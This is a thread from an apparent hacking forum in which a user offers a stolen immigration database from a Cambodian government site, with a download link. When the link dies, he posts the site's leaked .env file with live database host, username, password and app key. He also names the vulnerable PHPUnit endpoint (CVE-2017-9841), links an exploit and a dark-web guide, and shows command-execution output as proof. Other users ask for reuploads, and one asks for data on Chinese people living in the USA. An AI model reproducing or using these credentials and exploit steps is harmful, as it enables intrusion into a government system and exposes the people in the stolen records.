SQL Immigration of Cambodia

[Prokhorenco]

Host: https://immigration.gov.kh

General Department of Immigration Database

Download: https://anonfiles.com/r5paU469z6/ims_sql_zip (1.4 GIB)​

 

[NPSH]

Посмотрел.
Очень приличная вещь

Пасиба. Поставил жирный плюс

 

[AntiLegal]

Hi. maybe do you have USA immigration data?
pls write me in PM

 

[Prokhorenco]

Hi. maybe do you have USA immigration data?
pls write me in PM

No, but there are Americans in the data set.

 

[AntiLegal]

No, but there are Americans in the data set.

i need Chinese people who living in USA

 

[John Kramer]

Download: https://anonfiles.com/r5paU469z6/ims_sql_zip (1.4 GIB)

ссылка не работает

 

[Prokhorenco]

ссылка не работает

The anonfiles website is currently down not the link it self.

 

[thefirewall]

New link?

 

[Prokhorenco]

As anonfiles closed their doors (https://www.bleepingcomputer[.]com/news/security/file-sharing-site-anonfiles-shuts-down-due-to-overwhelming-abuse/) the link died. If you want the database you can hack it like i did and download it for yourself as im too lazy to do it again.

Database credentials: https://api.immigration.gov.kh/.env

APP_ENV=local
APP_DEBUG=false
APP_KEY=base64:Q2F7K5a8NwvA/sbI4dWELPH0KQgVtT+xIkfmkZIGD+4=

DB_CONNECTION=pgsql
DB_HOST=159.89.206.251
DB_PORT=5432
DB_DATABASE=ims
DB_USERNAME=ufpcsgdi
DB_PASSWORD=F@pcS@778f

CACHE_DRIVER=file
SESSION_DRIVER=file
QUEUE_DRIVER=sync

MAIL_DRIVER=smtp
MAIL_HOST=mailtrap.io
MAIL_PORT=2525
MAIL_USERNAME=null
MAIL_PASSWORD=null
MAIL_ENCRYPTION=null

API_PREFIX=api
API_VERSION=v1
API_STRICT=false
API_DEBUG=false

API_SIGNUP_TOKEN_RELEASE=true
API_RESET_TOKEN_RELEASE=true
API_RECOVERY_EMAIL_SUBJECT=bunthoeun.itb@gmail.com

Vuln endpoint (https://nvd.nist.gov/vuln/detail/CVE-2017-9841):

[CVE-2017-9841] [http] [critical] https://api.immigration.gov.kh/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php

POC:
Exploit: https://www.exploit-db.com/exploits/50702

For a full guide on how i found this vuln you can see: http://xssforum7mmh3n56inuf2h73hvhnzobi7h2ytb3gvklrfqm7ut3xdnyd.onion/threads/95115

Use https://www.adminer.org to download the database.

Proof:

user@host:~$ python3 exploit.py https://api.immigration.gov.kh/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
Vulnerable: https://api.immigration.gov.kh/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
> ls -la; id;whoami;uname -a
total 24
drwxrwxr-x 3 root root 4096 Feb 20 14:50 .
drwxrwxr-x 5 root root 4096 Feb 20 14:50 ..
-rw-rw-r-- 1 root root 2092 Feb 20 14:50 Default.php
drwxrwxr-x 2 root root 4096 Feb 20 14:50 Template
-rw-rw-r-- 1 root root 2654 Feb 20 14:50 Windows.php
-rw-rw-r-- 1 root root   54 Feb 20 14:50 eval-stdin.php
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data
Linux ub18-p5 4.15.0-197-generic #208-Ubuntu SMP Tue Nov 1 17:23:37 UTC 2022 x86_64 x86_64 x86_64 GNU/Linux

 

[stepabors]

К сожалению, не удается подключиться к базе
Пробовал самыми разными способами
Видимо закрыли дырку

 

[andbelov72]

Hello, community, maybe somebody can reload this database? Respected Prokhorenco do You have some opportunity to redownload this link? Anonimfiles is still away.

 

[nieckz]

i need Chinese people who living in USA

ccp spy?

 

[AntiLegal]

ccp spy?

???

 

[mtfk]

upload to new link

 

[Sandokan3000]

i would like to ask for reupload.

Thanks in advance